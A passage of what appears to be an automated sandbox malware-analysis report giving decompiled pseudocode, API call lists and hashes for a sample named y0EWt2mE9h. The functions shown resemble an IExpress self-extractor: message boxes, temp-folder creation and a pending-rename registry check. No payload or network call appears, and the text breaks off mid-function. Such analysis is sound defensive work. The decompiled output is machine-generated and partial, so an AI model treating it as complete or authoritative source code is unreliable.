                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xe78a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe79a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E00E71680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E7171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E00E7171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E00E7681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E00E767C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E00E7681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E00E767C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}
                                                                                                                                                                                                      0x00e74578
                                                                                                                                                                                                      0x00e7457c
                                                                                                                                                                                                      0x00e745cb
                                                                                                                                                                                                      0x00e74607
                                                                                                                                                                                                      0x00e74607
                                                                                                                                                                                                      0x00e7460d
                                                                                                                                                                                                      0x00e74613
                                                                                                                                                                                                      0x00e74617
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7461d
                                                                                                                                                                                                      0x00e74623
                                                                                                                                                                                                      0x00e74626
                                                                                                                                                                                                      0x00e74628
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74628
                                                                                                                                                                                                      0x00e745cd
                                                                                                                                                                                                      0x00e745cd
                                                                                                                                                                                                      0x00e745cf
                                                                                                                                                                                                      0x00e745cf
                                                                                                                                                                                                      0x00e745d2
                                                                                                                                                                                                      0x00e745d2
                                                                                                                                                                                                      0x00e745d4
                                                                                                                                                                                                      0x00e745d5
                                                                                                                                                                                                      0x00e745db
                                                                                                                                                                                                      0x00e745de
                                                                                                                                                                                                      0x00e745e3
                                                                                                                                                                                                      0x00e745e9
                                                                                                                                                                                                      0x00e745ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e745f3
                                                                                                                                                                                                      0x00e745fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74602
                                                                                                                                                                                                      0x00e745ed
                                                                                                                                                                                                      0x00e7457e
                                                                                                                                                                                                      0x00e7457e
                                                                                                                                                                                                      0x00e74580
                                                                                                                                                                                                      0x00e74580
                                                                                                                                                                                                      0x00e74583
                                                                                                                                                                                                      0x00e74583
                                                                                                                                                                                                      0x00e74585
                                                                                                                                                                                                      0x00e74586
                                                                                                                                                                                                      0x00e7458a
                                                                                                                                                                                                      0x00e7458c
                                                                                                                                                                                                      0x00e7458f
                                                                                                                                                                                                      0x00e7458f
                                                                                                                                                                                                      0x00e74591
                                                                                                                                                                                                      0x00e74592
                                                                                                                                                                                                      0x00e7459b
                                                                                                                                                                                                      0x00e7459e
                                                                                                                                                                                                      0x00e745a3
                                                                                                                                                                                                      0x00e745a9
                                                                                                                                                                                                      0x00e745ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e745af
                                                                                                                                                                                                      0x00e745af
                                                                                                                                                                                                      0x00e745bf
                                                                                                                                                                                                      0x00e7462d
                                                                                                                                                                                                      0x00e74630
                                                                                                                                                                                                      0x00e7463d
                                                                                                                                                                                                      0x00e7464e
                                                                                                                                                                                                      0x00e7464e
                                                                                                                                                                                                      0x00e7463f
                                                                                                                                                                                                      0x00e74640
                                                                                                                                                                                                      0x00e74647
                                                                                                                                                                                                      0x00e7464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7464c
                                                                                                                                                                                                      0x00e74666
                                                                                                                                                                                                      0x00e7466d
                                                                                                                                                                                                      0x00e7466f
                                                                                                                                                                                                      0x00e74675
                                                                                                                                                                                                      0x00e74675
                                                                                                                                                                                                      0x00e745ad
                                                                                                                                                                                                      0x00e74527
                                                                                                                                                                                                      0x00e7452e
                                                                                                                                                                                                      0x00e7453f
                                                                                                                                                                                                      0x00e7453f
                                                                                                                                                                                                      0x00e74530
                                                                                                                                                                                                      0x00e74531
                                                                                                                                                                                                      0x00e74538
                                                                                                                                                                                                      0x00e7453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7453d
                                                                                                                                                                                                      0x00e74554
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e74525
                                                                                                                                                                                                      0x00e7468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E745A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E745E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00E7460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00E74630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00E74666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E7466F
                                                                                                                                                                                                        • Part of subcall function 00E7681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E7686E
                                                                                                                                                                                                        • Part of subcall function 00E7681F: GetSystemMetrics.USER32(0000004A), ref: 00E768A7
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E768CC
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,?,0000000C), ref: 00E768F4
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegCloseKey.ADVAPI32(?), ref: 00E76902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 420a3164330606e9eabbb0fc3129ef5f3022e3deb2e4787239374e1bec210e6a
                                                                                                                                                                                                      • Instruction ID: 71285c30f93985824d31e5b2c3934c563dd6c0c3d4863dbafc521cb74ec23d73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420a3164330606e9eabbb0fc3129ef5f3022e3deb2e4787239374e1bec210e6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D5116B2900215AFDB21DF68DC48BAA7BA9EF85304F1491A5FD0DB3281DB31DE49CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00E7171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E00E71680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E00E7658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E00E76CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xe78a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E753FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2659685179
                                                                                                                                                                                                      • Opcode ID: 2b9c534fe506e1ac0262299b7f927504bedf506ea18def6c08a3977cc16ac3d1
                                                                                                                                                                                                      • Instruction ID: b2f5b1c41bbf1712a97fe15f1a416dc2171b664b67b5954d0a729ed6434e8d39
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b9c534fe506e1ac0262299b7f927504bedf506ea18def6c08a3977cc16ac3d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741104723006047BE720DB279C49FAF76ADEBC1315F049465F55EF2190DEB4898A86A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 e7256d-e7257d 564 e72583-e72589 563->564 565 e72622-e72627 call e724e0 563->565 566 e7258b 564->566 567 e725e8-e72607 RegOpenKeyExA 564->567 570 e72629-e7262f 565->570 569 e72591-e72595 566->569 566->570 571 e725e3-e725e6 567->571 572 e72609-e72620 RegQueryInfoKeyA 567->572 569->570 574 e7259b-e725ba RegOpenKeyExA 569->574 571->570 575 e725d1-e725dd RegCloseKey 572->575 574->571 576 e725bc-e725cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00E7256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E00E724E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00E74096,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?), ref: 00E725B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?,00E74096), ref: 00E725CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00E71ED3,00000001,00000000,?,?,00E74137,?,00E74096), ref: 00E725DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00E74096,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?), ref: 00E725FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00E74096,00000000,00000000,00000000,00000000,?,00E71ED3,00000001,00000000), ref: 00E7261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00E725F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00E725A8
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00E725C3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 655704bb9b6b01ccf0ade246b2f4bc8783b81a36ede5035a1b64ec2d190c3628
                                                                                                                                                                                                      • Instruction ID: c4c53ef670135c0b935b9cb2b4c390a09ceaa59bbec85805b4328ec22e6947f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 655704bb9b6b01ccf0ade246b2f4bc8783b81a36ede5035a1b64ec2d190c3628
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16116D35942229BBDB20DB929C0DDFFBEADEB517A5F1490A9B90CB2000D6304A48D6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 e76a60-e76a91 call e77155 call e77208 GetStartupInfoW 583 e76a93-e76aa2 577->583 584 e76aa4-e76aa6 583->584 585 e76abc-e76abe 583->585 587 e76aaf-e76aba Sleep 584->587 588 e76aa8-e76aad 584->588 586 e76abf-e76ac5 585->586 589 e76ac7-e76acf _amsg_exit 586->589 590 e76ad1-e76ad7 586->590 587->583 588->586 591 e76b0b-e76b11 589->591 592 e76b05 590->592 593 e76ad9-e76ae9 call e76c3f 590->593 595 e76b13-e76b24 _initterm 591->595 596 e76b2e-e76b30 591->596 592->591 597 e76aee-e76af2 593->597 595->596 598 e76b32-e76b39 596->598 599 e76b3b-e76b42 596->599 597->591 600 e76af4-e76b00 597->600 598->599 601 e76b67-e76b71 599->601 602 e76b44-e76b51 call e77060 599->602 604 e76c39-e76c3e call e7724d 600->604 603 e76b74-e76b79 601->603 602->601 610 e76b53-e76b65 602->610 607 e76bc5-e76bc8 603->607 608 e76b7b-e76b7d 603->608 611 e76bd6-e76be3 _ismbblead 607->611 612 e76bca-e76bd3 607->612 613 e76b94-e76b98 608->613 614 e76b7f-e76b81 608->614 610->601 616 e76be5-e76be6 611->616 617 e76be9-e76bed 611->617 612->611 619 e76ba0-e76ba2 613->619 620 e76b9a-e76b9e 613->620 614->607 618 e76b83-e76b85 614->618 616->617 617->603 618->613 622 e76b87-e76b8a 618->622 623 e76ba3-e76bbc call e72bfb 619->623 620->623 622->613 625 e76b8c-e76b92 622->625 627 e76c1e-e76c25 623->627 628 e76bbe-e76bbf exit 623->628 625->618 629 e76c27-e76c2d _cexit 627->629 630 e76c32 627->630 628->607 629->630 630->604
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E00E77155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xe772b8);
                                                                                                                                                                                                      				E00E77208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xe788b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xe788b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xe781e4 = _t58;
                                                                                                                                                                                                      							goto L13;
